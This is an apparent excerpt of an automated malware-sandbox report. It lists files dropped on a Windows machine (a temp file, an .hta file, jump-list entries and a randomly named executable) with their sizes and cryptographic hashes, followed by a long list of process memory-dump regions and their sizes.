  • C:\Users\Admin\AppData\Local\Temp\Tar4F6F.tmp
    Filesize

    183KB

    MD5

    109cab5505f5e065b63d01361467a83b

    SHA1

    4ed78955b9272a9ed689b51bf2bf4a86a25e53fc

    SHA256

    ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673

    SHA512

    753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\eI4eVGFep.hta
    Filesize

    717B

    MD5

    5d977c0ac2a351f0a92f4c72fdd151c9

    SHA1

    30c965c74d90e6e50020d5b8c4c039034eaf40e7

    SHA256

    61db899e2fd8ac4a3e745d419b81372da494d99ea7efff41c0cff06ba5ce2670

    SHA512

    331b9db7f42ab0d363d70ef6899f0f7f747fcde15b4e6e4ebc9e819366650aec7353ad5b58bed2dd7ff97178b55a0998d981980a91a1f377bc9fd561d5215bc2

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BDG3H753SCE0PNAEWZZ4.temp
    Filesize

    7KB

    MD5

    467eeeef6f76040ac7f858e22ba22e00

    SHA1

    19ecb8339c77dc151a161e9add5830e1c641c35b

    SHA256

    c98cc6b459194c706706d8047de79a01b04a4e77b25c6f15497a330e915248a5

    SHA512

    d2c04e55d446e492e976d97cb3542b077b9698cc2cf722937cb94c484dae081e8b991f661ff13853d46225a0fa58e4a29aa97d27d90f3efe64762c1a386313c1

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    2a33927803d5b8a39255b30d51f9e5a0

    SHA1

    8408d613db2ff3fc143960e5bc844a97c65866d9

    SHA256

    1609ee98f7df56f36f8fc06986be26de1744678b7621a5e9646ee61d7970ccce

    SHA512

    f3f0544c27473b5996a7513ccf5ad3de70af60a04cd091ca37afa721c9d942c744da50b4455c8ca04d624e169beb3240f698ac56037ab3d47c3c3f13bf410a81

    Download Submit

  • \Users\Admin\AppData\Local\Temp7CBXNQIVLTZIOSLXGK2OPEIWZNTT7SZ2.EXE
    Filesize

    1.8MB

    MD5

    e2b245896bddb54f763ae2b14aabcf38

    SHA1

    087ba6c039f997715682badc0781ff1c4d6a083f

    SHA256

    31ce09fc0b27e724a272685855cc533bd79a5a6d8994f5bbed27401930bc3699

    SHA512

    b47c7e88bb7e2cc146135aaa7fa6879e395f49e2d85c4b19d9b96ee82aeef27e97f4086f280dac9d24be53f01dbbcb80c6ae1f555ed0b250a54026da0c8053ca

    Download Submit

  • memory/372-180-0x0000000006640000-0x0000000006D2E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/372-36-0x00000000002E0000-0x00000000007B1000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/372-113-0x0000000006640000-0x0000000006ADB000-memory.dmp

    Filesize

    4.6MB

    Download

  • memory/372-114-0x0000000006640000-0x0000000006ADB000-memory.dmp

    Filesize

    4.6MB

    Download

  • memory/372-627-0x00000000002E0000-0x00000000007B1000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/372-593-0x00000000002E0000-0x00000000007B1000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/372-506-0x00000000002E0000-0x00000000007B1000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/372-133-0x0000000006640000-0x0000000006ADB000-memory.dmp

    Filesize

    4.6MB

    Download

  • memory/372-134-0x00000000002E0000-0x00000000007B1000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/372-135-0x0000000006640000-0x0000000006ADB000-memory.dmp

    Filesize

    4.6MB

    Download

  • memory/372-136-0x00000000002E0000-0x00000000007B1000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/372-137-0x00000000002E0000-0x00000000007B1000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/372-32-0x00000000002E0000-0x00000000007B1000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/372-152-0x0000000006640000-0x0000000006D2E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/372-154-0x0000000006640000-0x0000000006D2E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/372-457-0x00000000002E0000-0x00000000007B1000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/372-79-0x00000000002E0000-0x00000000007B1000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/372-179-0x0000000006640000-0x0000000006D2E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/372-432-0x00000000002E0000-0x00000000007B1000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/372-181-0x00000000002E0000-0x00000000007B1000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/372-77-0x0000000006020000-0x0000000006331000-memory.dmp

    Filesize

    3.1MB

    Download

  • memory/372-76-0x0000000006020000-0x0000000006331000-memory.dmp

    Filesize

    3.1MB

    Download

  • memory/372-59-0x00000000002E0000-0x00000000007B1000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/372-35-0x00000000002E0000-0x00000000007B1000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/372-98-0x00000000002E0000-0x00000000007B1000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/372-51-0x0000000006020000-0x0000000006331000-memory.dmp

    Filesize

    3.1MB

    Download

  • memory/372-52-0x0000000006020000-0x0000000006331000-memory.dmp

    Filesize

    3.1MB

    Download

  • memory/1324-344-0x0000000006470000-0x0000000006941000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/1324-345-0x0000000006470000-0x0000000006941000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/1520-537-0x0000000000060000-0x0000000000507000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/1548-155-0x0000000001240000-0x000000000192E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/1548-205-0x0000000001240000-0x000000000192E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/1632-95-0x000000013F930000-0x000000013FADE000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/1672-480-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1672-474-0x0000000000400000-0x0000000000465000-memory.dmp

    Filesize

    404KB

    Download

  • memory/1672-472-0x0000000000400000-0x0000000000465000-memory.dmp

    Filesize

    404KB

    Download

  • memory/1672-482-0x0000000000400000-0x0000000000465000-memory.dmp

    Filesize

    404KB

    Download

  • memory/1672-476-0x0000000000400000-0x0000000000465000-memory.dmp

    Filesize

    404KB

    Download

  • memory/1672-478-0x0000000000400000-0x0000000000465000-memory.dmp

    Filesize

    404KB

    Download

  • memory/1672-481-0x0000000000400000-0x0000000000465000-memory.dmp

    Filesize

    404KB

    Download

  • memory/1672-470-0x0000000000400000-0x0000000000465000-memory.dmp

    Filesize

    404KB

    Download

  • memory/1920-468-0x0000000000D80000-0x0000000000DF8000-memory.dmp

    Filesize

    480KB

    Download

  • memory/2208-54-0x0000000000B00000-0x0000000000E11000-memory.dmp

    Filesize

    3.1MB

    Download

  • memory/2208-97-0x0000000000B00000-0x0000000000E11000-memory.dmp

    Filesize

    3.1MB

    Download

  • memory/2208-78-0x0000000000B00000-0x0000000000E11000-memory.dmp

    Filesize

    3.1MB

    Download

  • memory/2228-442-0x0000000006610000-0x0000000006AE1000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/2264-484-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

    Download

  • memory/2264-502-0x0000000010000000-0x000000001001C000-memory.dmp

    Filesize

    112KB

    Download

  • memory/2264-485-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

    Download

  • memory/2280-624-0x00000000001A0000-0x000000000049E000-memory.dmp

    Filesize

    3.0MB

    Download

  • memory/2324-486-0x0000000001390000-0x0000000001D94000-memory.dmp

    Filesize

    10.0MB

    Download

  • memory/2324-483-0x0000000001390000-0x0000000001D94000-memory.dmp

    Filesize

    10.0MB

    Download

  • memory/2328-443-0x0000000000D70000-0x0000000001241000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/2404-13-0x0000000006570000-0x0000000006A41000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/2404-14-0x0000000006570000-0x0000000006A41000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/2948-28-0x00000000070C0000-0x0000000007591000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/2948-30-0x00000000012D0000-0x00000000017A1000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/2948-34-0x00000000070C0000-0x0000000007591000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/2948-353-0x0000000001060000-0x0000000001531000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/2948-15-0x00000000012D0000-0x00000000017A1000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/2948-346-0x0000000001060000-0x0000000001531000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/2968-121-0x00000000008F0000-0x0000000000D8B000-memory.dmp

    Filesize

    4.6MB

    Download

  • memory/2968-116-0x00000000008F0000-0x0000000000D8B000-memory.dmp

    Filesize

    4.6MB

    Download